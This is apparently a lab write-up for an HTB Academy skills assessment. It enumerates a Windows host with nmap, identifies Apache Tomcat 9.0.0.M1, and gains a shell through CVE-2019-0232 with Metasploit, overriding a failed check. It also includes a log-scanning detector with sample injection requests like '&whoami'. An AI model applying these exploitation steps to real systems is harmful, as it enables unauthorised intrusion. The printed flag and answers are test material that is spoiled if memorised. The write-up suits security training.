During a penetration test against the company Inlanefreight, you have performed extensive enumeration and found the network to be quite locked down and well-hardened. You come across one host of particular interest that may be your ticket to an initial foothold. Enumerate the target host for potentially vulnerable applications, obtain a foothold, and submit the contents of the flag.txt file to complete this portion of the skills assessment.
Questions:
What vulnerable application is running?
┌──(sasorirose㉿kazekageiii)-[~/…/HTB_Academy/Attacking_Common_Application/Skils_Assessments/part1]
└─$ sudo nmap -sV -sC 10.129.98.249 -ox nmap.xml
[sudo] password for sasorirose:
Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-05 01:12 UTC
Failed to resolve "nmap.xml".
Failed to resolve "nmap.xml".
Nmap scan report for 10.129.98.249
Host is up (0.24s latency).
Not shown: 990 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_09-01-21 08:07AM website_backup
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Freight Logistics, Inc
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=APPS-SKILLS1
| Not valid before: 2025-12-08T11:28:27
|_Not valid after: 2026-06-09T11:28:27
|_ssl-date: 2026-05-05T02:12:15+00:00; +59m14s from scanner time.
| rdp-ntlm-info:
| Target_Name: APPS-SKILLS1
| NetBIOS_Domain_Name: APPS-SKILLS1
| NetBIOS_Computer_Name: APPS-SKILLS1
| DNS_Domain_Name: APPS-SKILLS1
| DNS_Computer_Name: APPS-SKILLS1
| Product_Version: 10.0.17763
|_ System_Time: 2026-05-05T02:12:04+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8000/tcp open http Jetty 9.4.42.v20210604
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-server-header: Jetty(9.4.42.v20210604)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.0.M1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-05-05T02:12:10
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: 59m13s, deviation: 0s, median: 59m13s
Failed to resolve "nmap.xml".
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.23 seconds
Summary of Nmap scan:
Target: Windows Server (10.129.98.249)
Critical Findings (Attack Path):
- Port 21 (FTP): Anonymous login is enabled. Contains a website_backup directory. Start here to download files and hunt for hardcoded credentials.
- Port 8080 & 8009 (Apache Tomcat 9.0.0.M1): The primary exploitation target. Once you find credentials in the FTP backup, use them to log into the Tomcat Manager on 8080 to upload a reverse shell. Port 8009 (AJP) also suggests it may be vulnerable to Ghostcat.
Secondary Web Targets:
- Port 8000 (Jetty): Check the robots.txt file for hidden directories.
- Port 80 (IIS): Standard company website ("Freight Logistics, Inc."). Fuzz for hidden directories if Tomcat fails.
Hold for Later (Requires Credentials):
- Ports 445 (SMB), 3389 (RDP), 5985 (WinRM): Use these for remote access and lateral movement after you have found valid usernames and passwords.
Answer: Tomcat
What port is this application running on?
Answer: 8080
What version of the application is in use?
Answer: 9.0.0.M1
Exploit the application to obtain a shell and submit the contents of the flag.txt file on the Administrator desktop.
Next, let's enumerate the Tomcat service more deeply first; if that turns up nothing, we continue enumerating the other services.

Googling for PoCs and CVEs related to this version.
I checked for RCE exploits for Apache Tomcat 9.0.0.M1 and found a Rapid7 article that seemed promising:
https://www.rapid7.com/db/vulnerabilities/apache-tomcat-cve-2019-0232/
That led to me googling for a CVE-2019-0232 PoC, and I found
https://github.com/setrus/CVE-2019-0232
which told me there was a Metasploit module for this exploit, but ALSO reminded me that I needed to fuzz for CGI scripts.
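From the defender's side, CVE-2019-0232 leaves a clear footprint: a request for a .bat or .cmd script under the CGI mapping whose query string (after URL decoding) carries cmd.exe separators such as & or |. The following script is an added example, not part of the original writeup or the Metasploit module; it runs that check over a few constructed Tomcat access-log lines (the /cgi/ path prefix and the log format are assumptions).

```python
import re
from urllib.parse import unquote_plus

# Constructed sample Tomcat access-log lines (Common Log Format); not real traffic.
SAMPLE_LOG = """\
10.10.14.5 - - [05/May/2026:02:20:11 +0000] "GET /cgi/cmd.bat?&dir HTTP/1.1" 200 512
10.10.14.5 - - [05/May/2026:02:20:13 +0000] "GET /cgi/cmd.bat?&whoami HTTP/1.1" 200 41
10.10.14.5 - - [05/May/2026:02:21:02 +0000] "GET /cgi/cmd.bat?%26ver HTTP/1.1" 200 300
10.10.14.9 - - [05/May/2026:02:22:40 +0000] "GET /cgi/report.bat?date=2026-05-05 HTTP/1.1" 200 2048
10.10.14.9 - - [05/May/2026:02:22:41 +0000] "GET /index.jsp?q=a%26b HTTP/1.1" 200 1000
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Separator and redirection characters that cmd.exe honours on the command line.
# With enableCmdLineArguments=true, the CGI servlet hands the query string to the
# script's command line, so these characters are what turns a query into a command.
META = set("&|<>^")
CGI_PREFIX = "/cgi/"  # assumed CGI servlet mapping; adjust to the deployment's web.xml


def is_cgi_cmd_injection(target: str) -> bool:
    """True when a request target looks like CVE-2019-0232 abuse."""
    path, sep, query = target.partition("?")
    if not sep or not path.lower().startswith(CGI_PREFIX):
        return False
    if not path.lower().endswith((".bat", ".cmd")):
        return False
    decoded = unquote_plus(query)  # %26 -> &, + -> space, etc.
    return any(ch in META for ch in decoded)


def scan_log(text: str) -> list[dict]:
    """Return one record per log line whose request target matches the pattern."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_cgi_cmd_injection(m["target"]):
            hits.append({"src": m["src"], "ts": m["ts"],
                         "target": m["target"], "status": int(m["status"])})
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"{h['ts']} {h['src']} -> {h['target']} ({h['status']})")
```

A match with status 200 means the script actually ran the injected command; the fix is to leave enableCmdLineArguments at its default of false (or remove the CGI servlet mapping) and move off the affected 9.0.0.M1 to 9.0.17 range.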
Running ffuf to try to find CGI scripts:
┌──(sasorirose㉿kazekageiii)-[~/…/HTB_Academy/Attacking_Common_Application/Skils_Assessments/part1]
└─$ ffuf -u http://10.129.99.6:8080/cgi/FUZZ.bat -w /usr/share/dirb/wordlists/common.txt


Setting up the reverse shell in msfconsole:
msf exploit(windows/http/tomcat_cgi_cmdlineargs) > set lhost tun0
lhost => tun0
msf exploit(windows/http/tomcat_cgi_cmdlineargs) > set lhost tun0
lhost => tun0
msf exploit(windows/http/tomcat_cgi_cmdlineargs) > set rhosts 10.129.99.6
rhosts => 10.129.99.6
msf exploit(windows/http/tomcat_cgi_cmdlineargs) > set rport 8080
rport => 8080
msf exploit(windows/http/tomcat_cgi_cmdlineargs) > set targeturi /cgi/cmd.bat
targeturi => /cgi/cmd.bat
msf exploit(windows/http/tomcat_cgi_cmdlineargs) > run
when I attempted to run it, I got the following error:
Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.
Because I had manually tested the injection myself, I felt comfortable setting ForceExploit to true; when I did that it worked and I got a shell.

Use "shell" to drop into a command prompt, switch to PowerShell, and read the flag.

Answer: f55763d31a8f63ec935abd07aee5d3d0